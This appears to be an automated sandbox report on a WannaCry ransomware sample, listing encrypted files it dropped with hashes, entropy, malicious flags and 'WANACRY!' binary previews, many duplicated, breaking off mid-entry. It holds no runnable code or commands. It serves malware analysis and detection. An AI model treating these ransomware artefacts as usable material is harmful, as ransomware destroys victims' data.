                                                                                      Preview:WANACRY!....}.p.....R9.8...{#g.E....B.)O..,.J............+=3d2...R..f..3..Z.O..9=.G.VEl.....1C.....^$..sjB.........K....]........$jgjpO..Y..z..D~[......=P..H.-..H..`.y^.>_3I..m.{..a.%.2.c.(..R.Zt.7.F.....N.v.v.)i`.&[:..T;..F.<..7....9.l..=;W.a.eQ9>W*..s..;.t.i....0r......@...W.?.SP.Z..>............V.#......5...XH..A..&tX.0......&.pK...2Zd/...[..A.._.o....9....4.....?2....`...3.L?..X..ee9.wx%...!.<...;J.0.F.%..\+u.S...t..\-.....!...........E...=d.)b...Z..;a.3v.....$U.'3.....LW_'.&..'UB....#.q]+6..C.?....!..R."..t.._E'j.S.D..n&?.8.n.(.k..e....^.....G.s\.Z..*8..F...D2...O4=.0...y...J..=....AI.-.y....y..L..^r.W..F...UZ.e]n"....p.l...G8P..*(..g^.H....V..o9A...s.yYnn.*.57....m...r.1......(b&_.$.#...O..p)...ij......j3^V.....F#...k(.3OW.2>..te^...Gk.*.;.]X. /....C.D.u.....W3t$..lJe.Ih...].i...lZ*...p...>....d....u.....Ow~....D...}e'Q{e'.....W......6V....;..57.cB...O'..F.........6.......J... Zc..Z.....=.K..j.......l.x......mR....-Y.,...Q.I|...'...M.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.196083017689055
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkENDvyOpyAuSWoaMemd+ySml0Tz9ruWrQFPt3qqMSKW6TXPf2QqhHoqlW:bkElq+LWoaMHumlo9rusQ3q3Smz2xvW
                                                                                      MD5:3ABB0CE138954B6B3CE46E322FCFE716
                                                                                      SHA1:270D05B46A6493233B6DF0A69509A54A612B0D2E
                                                                                      SHA-256:6FBFE570F1BFD84521673F9249B0735A5BBC6CAAA51079DAFA87E22BD8C219BB
                                                                                      SHA-512:E4F0D66503D804CE18D6596BCEB0806B7EDAB4F7AFF90A98F18B91F994E0D54CB647730334F6E20E296701130C51A8281D6D6CC176337220F505608E7302545B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......+(G...6[ICtRQ..<h.,l..>y.....xo.m.n.p..k..e....7@.[.......]..z...|.....\7.b..[I.....W.).......&.C......k...{......K..ZM=T..VbT..k.yw..sg...n.....yn@.%..$b.Z.KW.W.zf..?..%.)..NT3..Ey}._..3..mx.GO.`.5[..OilX...o.r..r.c..|..g......,].c.4.b..............cv..u...1....l....3.U..U.F'.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.196083017689055
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkENDvyOpyAuSWoaMemd+ySml0Tz9ruWrQFPt3qqMSKW6TXPf2QqhHoqlW:bkElq+LWoaMHumlo9rusQ3q3Smz2xvW
                                                                                      MD5:3ABB0CE138954B6B3CE46E322FCFE716
                                                                                      SHA1:270D05B46A6493233B6DF0A69509A54A612B0D2E
                                                                                      SHA-256:6FBFE570F1BFD84521673F9249B0735A5BBC6CAAA51079DAFA87E22BD8C219BB
                                                                                      SHA-512:E4F0D66503D804CE18D6596BCEB0806B7EDAB4F7AFF90A98F18B91F994E0D54CB647730334F6E20E296701130C51A8281D6D6CC176337220F505608E7302545B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......+(G...6[ICtRQ..<h.,l..>y.....xo.m.n.p..k..e....7@.[.......]..z...|.....\7.b..[I.....W.).......&.C......k...{......K..ZM=T..VbT..k.yw..sg...n.....yn@.%..$b.Z.KW.W.zf..?..%.)..NT3..Ey}._..3..mx.GO.`.5[..OilX...o.r..r.c..|..g......,].c.4.b..............cv..u...1....l....3.U..U.F'.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.230321922603394
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE/OnIL5gmDoNMt0PX4Ef4VUE+Vk0tkntendZmlB+YFA3uncMB:bkE/O85ZaPX4Ef4VUjknQd8lBJFA3CB
                                                                                      MD5:7C05EEDCA0B1ABFA872EB1600391ACC0
                                                                                      SHA1:5D79D90B51F0F319E4A81498EDC183B27C2B75BD
                                                                                      SHA-256:D029A5614718D78AB780894350BA0CA84671B473A30378161ADFC807F0D3002F
                                                                                      SHA-512:930C4617A9419DA1E8DE99E0979C17772AD52376BD9BE52DBEAFBB214D0B04009F78347F04157A555EC2F74644603D252068373852C085C82D95415FD8163864
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......6m..U..7.....N.|&..=....Vj...........g.y...~..8.l...,......b .J3..1I.f.v$.(..n.b).n..,...*...gP..9.!2* ....%...H...=^...C....c.. .N..-..]...~.N...$a.C.Z6.....Q #L.zW.v.^,.H\..0.Y`p..h.O.....L@L......DA8.][.8.(.x._.Q.v..... [..wL.V.N..'...}...q.............L......M`..>0.4..<.N.-....y`e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.230321922603394
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE/OnIL5gmDoNMt0PX4Ef4VUE+Vk0tkntendZmlB+YFA3uncMB:bkE/O85ZaPX4Ef4VUjknQd8lBJFA3CB
                                                                                      MD5:7C05EEDCA0B1ABFA872EB1600391ACC0
                                                                                      SHA1:5D79D90B51F0F319E4A81498EDC183B27C2B75BD
                                                                                      SHA-256:D029A5614718D78AB780894350BA0CA84671B473A30378161ADFC807F0D3002F
                                                                                      SHA-512:930C4617A9419DA1E8DE99E0979C17772AD52376BD9BE52DBEAFBB214D0B04009F78347F04157A555EC2F74644603D252068373852C085C82D95415FD8163864
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......6m..U..7.....N.|&..=....Vj...........g.y...~..8.l...,......b .J3..1I.f.v$.(..n.b).n..,...*...gP..9.!2* ....%...H...=^...C....c.. .N..-..]...~.N...$a.C.Z6.....Q #L.zW.v.^,.H\..0.Y`p..h.O.....L@L......DA8.][.8.(.x._.Q.v..... [..wL.V.N..'...}...q.............L......M`..>0.4..<.N.-....y`e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.185770209366563
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEiB6KiC0Bt7lKebeoGRTntyAJHeezOohEll+nOybPuhK9GDcn:bkEiB6KiCmEoQkAJ+kEr+r7N9Gg
                                                                                      MD5:F7E88CF5A6CB0087977A23D3AA5C466D
                                                                                      SHA1:657AB83C8C3609ECCCFE342351C215C5C109649D
                                                                                      SHA-256:D83CA23AE1487500CDFFF6D35F727D0E4E8A40B0721448A30041D78720B1CB20
                                                                                      SHA-512:D9A4374D1D48EA0DCBCF0AD93197915CBF4924F102199FCB30A76ADF4D3950138B8281309768B5D619D37011F3D37CBA41D7C308911ADCDB2C669D0633ACF9A4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........$..Z+M.9`.?....`#..p..U....Y......8.....F...k.....i~1....&...g]b*G...W..'....H}N..M.|K`.....+...g...K...k#.J...G.."..{{/....._.W_O...%.x........tv.tT...y"V...6<...J..ak.R..%... ..F.v.E.f9w...Q..]..Q.;.F..b.L.F/>.X..@.....v.6...u..../.............q..z. #.9...Q.K....YsX......I
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.185770209366563
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEiB6KiC0Bt7lKebeoGRTntyAJHeezOohEll+nOybPuhK9GDcn:bkEiB6KiCmEoQkAJ+kEr+r7N9Gg
                                                                                      MD5:F7E88CF5A6CB0087977A23D3AA5C466D
                                                                                      SHA1:657AB83C8C3609ECCCFE342351C215C5C109649D
                                                                                      SHA-256:D83CA23AE1487500CDFFF6D35F727D0E4E8A40B0721448A30041D78720B1CB20
                                                                                      SHA-512:D9A4374D1D48EA0DCBCF0AD93197915CBF4924F102199FCB30A76ADF4D3950138B8281309768B5D619D37011F3D37CBA41D7C308911ADCDB2C669D0633ACF9A4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........$..Z+M.9`.?....`#..p..U....Y......8.....F...k.....i~1....&...g]b*G...W..'....H}N..M.|K`.....+...g...K...k#.J...G.."..{{/....._.W_O...%.x........tv.tT...y"V...6<...J..ak.R..%... ..F.v.E.f9w...Q..]..Q.;.F..b.L.F/>.X..@.....v.6...u..../.............q..z. #.9...Q.K....YsX......I
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):418488
                                                                                      Entropy (8bit):7.99957246403222
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:3zrA97Bx35FP9SCm3SglwYuKG2T4A9O89xgmT:X8fo3llJG23xT
                                                                                      MD5:6F47CF0214200932D465468F6FC80340
                                                                                      SHA1:64D9DAD47A7FF73CBC784547618D780E5A252D7B
                                                                                      SHA-256:2F60F154349609BBC2734D5F956A8454224D934470E5E342F1DC3009E3F5BBB3
                                                                                      SHA-512:6BD2B045C5D8F6DFB9E239499F22FA34CEC04E2A169543D762B354C1FC80AEF7707C9DD8A068BD1E2A61D15D579B71275FB881F23B8BD798B7BACA3EB4DC1BFC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....R.JI.Y.V"...H.F.Os..s?..%.._z.l...+D....B...5......g.......Ea..Y.......s..vKK....F..Yt.P}f:nd.P....ZI..:....87..8..|.].(wG....I..V...?...J.{[^.......I%#/.,.v../yLp..Vi..|=1..........+.N.m..c.M.K*`.2....r.:^h.C.P....@...k.G""z.N.x.....E.)Z.j&.....a........gV.....3@.f.A.kJ....).K.d.y.:{..g3....q.JF|.RrLJ..b^?Uc.'^Ak..w....+._.Z..X<.......XP)..4...uCMt...U.h.,.........SC"m.w......vQ.#...k.....b....`.**.+.y..Z........I@...7.\.?..{.w`..b..}.N*.I.....R..1<vh.I.1..3..W.).=9.$......]..M....R..u-G..{.2Q..#J W...T=...Qr...2.+T8....L.q{..v......I..Q|.'.U...4t-[...il*F..N.IZ......8..n..%....:).......)....*:d......Y`M..z.B..'.:_./4)....*......J.@.<.....`.ZYC..../........tO..].]......KQ.....3J..05..W(;....*az.LG......3...Q....>...k.....)...L...4..yUA..H..Ddq.%.?Q........Hz./|...~.EV......=J....$x..ef.gd.Q.Y2g..J....2<z#Kl.=..N......<8..1.+.....J..RU..7av/.h.".Bi.q7..iI.....pQr=.m....8...O..r....|...Q...A:..0gM.P..,W...M...w.i.......t._.q..O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):418488
                                                                                      Entropy (8bit):7.99957246403222
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:3zrA97Bx35FP9SCm3SglwYuKG2T4A9O89xgmT:X8fo3llJG23xT
                                                                                      MD5:6F47CF0214200932D465468F6FC80340
                                                                                      SHA1:64D9DAD47A7FF73CBC784547618D780E5A252D7B
                                                                                      SHA-256:2F60F154349609BBC2734D5F956A8454224D934470E5E342F1DC3009E3F5BBB3
                                                                                      SHA-512:6BD2B045C5D8F6DFB9E239499F22FA34CEC04E2A169543D762B354C1FC80AEF7707C9DD8A068BD1E2A61D15D579B71275FB881F23B8BD798B7BACA3EB4DC1BFC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....R.JI.Y.V"...H.F.Os..s?..%.._z.l...+D....B...5......g.......Ea..Y.......s..vKK....F..Yt.P}f:nd.P....ZI..:....87..8..|.].(wG....I..V...?...J.{[^.......I%#/.,.v../yLp..Vi..|=1..........+.N.m..c.M.K*`.2....r.:^h.C.P....@...k.G""z.N.x.....E.)Z.j&.....a........gV.....3@.f.A.kJ....).K.d.y.:{..g3....q.JF|.RrLJ..b^?Uc.'^Ak..w....+._.Z..X<.......XP)..4...uCMt...U.h.,.........SC"m.w......vQ.#...k.....b....`.**.+.y..Z........I@...7.\.?..{.w`..b..}.N*.I.....R..1<vh.I.1..3..W.).=9.$......]..M....R..u-G..{.2Q..#J W...T=...Qr...2.+T8....L.q{..v......I..Q|.'.U...4t-[...il*F..N.IZ......8..n..%....:).......)....*:d......Y`M..z.B..'.:_./4)....*......J.@.<.....`.ZYC..../........tO..].]......KQ.....3J..05..W(;....*az.LG......3...Q....>...k.....)...L...4..yUA..H..Ddq.%.?Q........Hz./|...~.EV......=J....$x..ef.gd.Q.Y2g..J....2<z#Kl.=..N......<8..1.+.....J..RU..7av/.h.".Bi.q7..iI.....pQr=.m....8...O..r....|...Q...A:..0gM.P..,W...M...w.i.......t._.q..O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):416088
                                                                                      Entropy (8bit):7.999538157614816
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:7WunT5EgpP/MH5RaorvtNVFQvG2Cs6fL3ocfHVa+QsM8UeT+/vak7WtkT:7x1eH5RrvfVFMG2CPfLNfHVa+QR8ozN
                                                                                      MD5:9541A1DB043311BF6292F47EEBB7A241
                                                                                      SHA1:DE64DE4E749577C591CBB0EADCCB898EA0AD7F44
                                                                                      SHA-256:8AB5D39F641E2F56AD962C9E2BD39F6A10209FC1AAA7729752220E871AB2693A
                                                                                      SHA-512:05658FB1D5DF3B2AD10554247D4FF721C14E2F905BFD7942A11CA113E21C692645DAAF905CC9C65B23D8CF594EE2401AD998C4735D6E151154DFA1DA12898F14
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......4nD.z{B]_....P.Y.G..3...j$3T.w...@...U......M.+.Ny.,=1.q.m.rB.y.U...(\..<....I..Xx(.(.pg|7.^p./..(!..-b..~..5(t.c.AW}.}..-.dk}..k..ZP.1...c.\......#..)...;~.5.&p......8_..!*.}..Ne,.......8w6.~.;...g...H.|.....>.Z......Te.a.o..]...*.3.11q......2X.........S........Y....46.d.nL&i.....,!X.Mf.$..o..\...$63{9s..!F.....K.:...%...w..,...%>..Q.._..2y...*.I..C.9./.5..."..G.5..(..8..|k.........).L...z.C...(P.J.^#0.Z...(..*6....Y\.Q0a.`.P...W...0....x.... ...Uz..TE6...zq..@...%.Tk.Fa.l...5.9...`X.4.\.4.9^f.hB........Jf..".V@..pW@........m~.....F.....Sk..Q7%...4[.eh.... V.......A.......3L...XH............wH.....s........ar...Q...J!v.......po.9.tG....s..2.,K.{..!....Z.j...4.?.........i5Be]...:g.K......_.~D>=..N.m...E~W....=...0pE.kS9......&%.$...$1.(......`.v........W.2..jD...<...m...!$.cY....V.F..XY.$......\......(.{X..Bf.7.r...'.._......~..ow.P....r5.s"..Iw..#.$..D:...m..\..)?..Vg..U.~.2...y....... a......"2N.Z=.bp..Vl.....s...z.rXn
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):416088
                                                                                      Entropy (8bit):7.999538157614816
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:7WunT5EgpP/MH5RaorvtNVFQvG2Cs6fL3ocfHVa+QsM8UeT+/vak7WtkT:7x1eH5RrvfVFMG2CPfLNfHVa+QR8ozN
                                                                                      MD5:9541A1DB043311BF6292F47EEBB7A241
                                                                                      SHA1:DE64DE4E749577C591CBB0EADCCB898EA0AD7F44
                                                                                      SHA-256:8AB5D39F641E2F56AD962C9E2BD39F6A10209FC1AAA7729752220E871AB2693A
                                                                                      SHA-512:05658FB1D5DF3B2AD10554247D4FF721C14E2F905BFD7942A11CA113E21C692645DAAF905CC9C65B23D8CF594EE2401AD998C4735D6E151154DFA1DA12898F14
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......4nD.z{B]_....P.Y.G..3...j$3T.w...@...U......M.+.Ny.,=1.q.m.rB.y.U...(\..<....I..Xx(.(.pg|7.^p./..(!..-b..~..5(t.c.AW}.}..-.dk}..k..ZP.1...c.\......#..)...;~.5.&p......8_..!*.}..Ne,.......8w6.~.;...g...H.|.....>.Z......Te.a.o..]...*.3.11q......2X.........S........Y....46.d.nL&i.....,!X.Mf.$..o..\...$63{9s..!F.....K.:...%...w..,...%>..Q.._..2y...*.I..C.9./.5..."..G.5..(..8..|k.........).L...z.C...(P.J.^#0.Z...(..*6....Y\.Q0a.`.P...W...0....x.... ...Uz..TE6...zq..@...%.Tk.Fa.l...5.9...`X.4.\.4.9^f.hB........Jf..".V@..pW@........m~.....F.....Sk..Q7%...4[.eh.... V.......A.......3L...XH............wH.....s........ar...Q...J!v.......po.9.tG....s..2.,K.{..!....Z.j...4.?.........i5Be]...:g.K......_.~D>=..N.m...E~W....=...0pE.kS9......&%.$...$1.(......`.v........W.2..jD...<...m...!$.cY....V.F..XY.$......\......(.{X..Bf.7.r...'.._......~..ow.P....r5.s"..Iw..#.$..D:...m..\..)?..Vg..U.~.2...y....... a......"2N.Z=.bp..Vl.....s...z.rXn
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.172746904822222
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE9pSQKhoceOhhTC+Qfdo+tLwgazUT+rM3KDFKc9mkq/Y:bkE9pSQDceiTC++/Gu+Sgbmkf
                                                                                      MD5:1A49159874EE25A1221D8AAC4A801926
                                                                                      SHA1:5F7094B35667CDEFFB6B508997B5444D6157521C
                                                                                      SHA-256:979314C93D92DAD8FFF908DA4EF91C4353061B925BB423750C756D4CB29240D4
                                                                                      SHA-512:64ABE4C7281B3B7A4B9472EFA4E6BDE9D24416501020B8B1144C78AD3C6AC8F3D14539131E7C508C83C26CC65B879EAAFDE1E3FA5EA1C24A2C53B5F107BE31E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w...V..o...O.$m..{...tC5c!...D.O......N...+D.1.;.X..]k..GYr....A....j..0a.l.GQC...`.]o.@..>....B|........>1...ZA..uZ.....i./...E...L.......$N'.h....2..1V.t.2[...R..f*..(..Ch.%...w`L...~.....x.tI:.Yb.(nJ..j.b....::....`"....(3c%.......1...................H.L..6..yo<.(...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.172746904822222
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE9pSQKhoceOhhTC+Qfdo+tLwgazUT+rM3KDFKc9mkq/Y:bkE9pSQDceiTC++/Gu+Sgbmkf
                                                                                      MD5:1A49159874EE25A1221D8AAC4A801926
                                                                                      SHA1:5F7094B35667CDEFFB6B508997B5444D6157521C
                                                                                      SHA-256:979314C93D92DAD8FFF908DA4EF91C4353061B925BB423750C756D4CB29240D4
                                                                                      SHA-512:64ABE4C7281B3B7A4B9472EFA4E6BDE9D24416501020B8B1144C78AD3C6AC8F3D14539131E7C508C83C26CC65B879EAAFDE1E3FA5EA1C24A2C53B5F107BE31E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w...V..o...O.$m..{...tC5c!...D.O......N...+D.1.;.X..]k..GYr....A....j..0a.l.GQC...`.]o.@..>....B|........>1...ZA..uZ.....i./...E...L.......$N'.h....2..1V.t.2[...R..f*..(..Ch.%...w`L...~.....x.tI:.Yb.(nJ..j.b....::....`"....(3c%.......1...................H.L..6..yo<.(...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.161259555175497
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEV0RVWEzvnAaihBvImfpiefanceZmGKP33vuFNXtygImzC9g375W5Oz:bkE8WE7Aaing2MZnc/DP33voPpzogL5X
                                                                                      MD5:EC65F0F0DCFFF6269B6ECB0F7F1FE282
                                                                                      SHA1:0EE30929ECA199909D8C314C8C7475017D77119F
                                                                                      SHA-256:7E2AEF4B3D08F8FCF88E49CF0365EC73CFF5A2CBBCD079E14138274BE39A2AC3
                                                                                      SHA-512:719323D1C039FA808EE2398D7FCF5588A66731BD7AA21F81217780FDBE53FF4F7350F101AFCC457C7C22125AFA2C92E7A7D374F489DEB73A3551DAFB5B36C13A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....S.......c..f......%...8..t66.D.v.s!.......(.a9....O..w..}se.C.2....v.C. _.x..v.S..Z..R.ve.B...<....>b.&..{.;..zc/........^.[D.l..J...%}....s........Cp39.`(......'.~I..n9.a{..,......._%t&O..R...C.k. ......3/?N. ....q.=+..*^.g..V..[j...aO...............K......$.Esi.71-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.161259555175497
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEV0RVWEzvnAaihBvImfpiefanceZmGKP33vuFNXtygImzC9g375W5Oz:bkE8WE7Aaing2MZnc/DP33voPpzogL5X
                                                                                      MD5:EC65F0F0DCFFF6269B6ECB0F7F1FE282
                                                                                      SHA1:0EE30929ECA199909D8C314C8C7475017D77119F
                                                                                      SHA-256:7E2AEF4B3D08F8FCF88E49CF0365EC73CFF5A2CBBCD079E14138274BE39A2AC3
                                                                                      SHA-512:719323D1C039FA808EE2398D7FCF5588A66731BD7AA21F81217780FDBE53FF4F7350F101AFCC457C7C22125AFA2C92E7A7D374F489DEB73A3551DAFB5B36C13A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....S.......c..f......%...8..t66.D.v.s!.......(.a9....O..w..}se.C.2....v.C. _.x..v.S..Z..R.ve.B...<....>b.&..{.;..zc/........^.[D.l..J...%}....s........Cp39.`(......'.~I..n9.a{..,......._%t&O..R...C.k. ......3/?N. ....q.=+..*^.g..V..[j...aO...............K......$.Esi.71-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):190440
                                                                                      Entropy (8bit):7.99899626123218
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:IX82CZ/YgqrnRJW+4PkdDisk6xRK/mch/cfHx7Zjmkim5pnZzJwWbf31PUNsj3b7:IMTZgVR82+WR+mch/Qx7ZjD9HJbf1cNe
                                                                                      MD5:0B84C505F31FD1425675CBFF1299CA36
                                                                                      SHA1:AC1BF853B0843F45D43EE149D06E705A4364F9FE
                                                                                      SHA-256:B3D024F3A2C9718B8518B93E07BA3BDEBF40A42F55BB13C8544B81DD004C0773
                                                                                      SHA-512:24C78B8FE35C1BC496D09866DA106AADA88BDFD714D62157D26AD5B14374303BD1578D1719514A143A9C95593747A7563F4539F3BCF282148B9316DB7CB0F835
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........\........]..JU.:.A..G..P.c7C...#g.c.d.....)...#._..@Q...C+..`..*'?.n.....|....J.zs...4..........mI...r..]...a7../.).]F*B.hk.W........K....n.a.m...}.`..j.)................. x.}.c...'.b..,.....T..[..Xz..._..T@I......wq..>G..|.a.|..~^..80.s|.7..............I........LxF...4r.Y..,.v.. ..l.........](tIT......Y.L.x;G..E.?]KVTmh.....a...m.7IbL..U.&<1....[.."..z...:.d...Q...("e.-.j.v+.=...f..."6S..A.]......z......1..m....w.B. T....O.m...`....k8..t.Z1..O..1..4.3@.....|.....A...R.....w.@.....B.O.A.[...U..oX.MNV......55....q3F......b.(M.b..i-Sk.N5.A..$....vu...8.g.....7(...Q;.G..I.(.H......qT......3!8=1...mZ.ysb(.....}\Ig.zZ..>.,...y.d=Y...[.[.Nj......H........_..8.'.I.N;.:.Z.....#..p....O...n.'.....:.Nx6.*.....9.A.u..X...h.Xv...I....L..\.*U.u...)@U%.t5....im...... 9<..f......t..J]...e.8..!.....e.@~.!...'L..g]4M.7Y....y1.......S....c....>.F.F.=.mu...H.w...Q.G=.hv.Z..iy...;.=k.T...f..-............!s...1.?.v....0.~....Y..[0.......r...eW
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):190440
                                                                                      Entropy (8bit):7.99899626123218
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:IX82CZ/YgqrnRJW+4PkdDisk6xRK/mch/cfHx7Zjmkim5pnZzJwWbf31PUNsj3b7:IMTZgVR82+WR+mch/Qx7ZjD9HJbf1cNe
                                                                                      MD5:0B84C505F31FD1425675CBFF1299CA36
                                                                                      SHA1:AC1BF853B0843F45D43EE149D06E705A4364F9FE
                                                                                      SHA-256:B3D024F3A2C9718B8518B93E07BA3BDEBF40A42F55BB13C8544B81DD004C0773
                                                                                      SHA-512:24C78B8FE35C1BC496D09866DA106AADA88BDFD714D62157D26AD5B14374303BD1578D1719514A143A9C95593747A7563F4539F3BCF282148B9316DB7CB0F835
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........\........]..JU.:.A..G..P.c7C...#g.c.d.....)...#._..@Q...C+..`..*'?.n.....|....J.zs...4..........mI...r..]...a7../.).]F*B.hk.W........K....n.a.m...}.`..j.)................. x.}.c...'.b..,.....T..[..Xz..._..T@I......wq..>G..|.a.|..~^..80.s|.7..............I........LxF...4r.Y..,.v.. ..l.........](tIT......Y.L.x;G..E.?]KVTmh.....a...m.7IbL..U.&<1....[.."..z...:.d...Q...("e.-.j.v+.=...f..."6S..A.]......z......1..m....w.B. T....O.m...`....k8..t.Z1..O..1..4.3@.....|.....A...R.....w.@.....B.O.A.[...U..oX.MNV......55....q3F......b.(M.b..i-Sk.N5.A..$....vu...8.g.....7(...Q;.G..I.(.H......qT......3!8=1...mZ.ysb(.....}\Ig.zZ..>.,...y.d=Y...[.[.Nj......H........_..8.'.I.N;.:.Z.....#..p....O...n.'.....:.Nx6.*.....9.A.u..X...h.Xv...I....L..\.*U.u...)@U%.t5....im...... 9<..f......t..J]...e.8..!.....e.@~.!...'L..g]4M.7Y....y1.......S....c....>.F.F.=.mu...H.w...Q.G=.hv.Z..iy...;.=k.T...f..-............!s...1.?.v....0.~....Y..[0.......r...eW
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):38056
                                                                                      Entropy (8bit):7.994863091293873
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:M7y53I70cI4KDA/cRSbhOs/xfCIim9UDQ6ApInc0u0mDouKj:7tm0cI4KDkc0Qs/xfCIdeDQ6ApIk0m8
                                                                                      MD5:88AE7C5DFC9F8E5E0657BC8CD5FAD8D5
                                                                                      SHA1:5C9433F767CB5038323EACBBECC8DD23073DB3B3
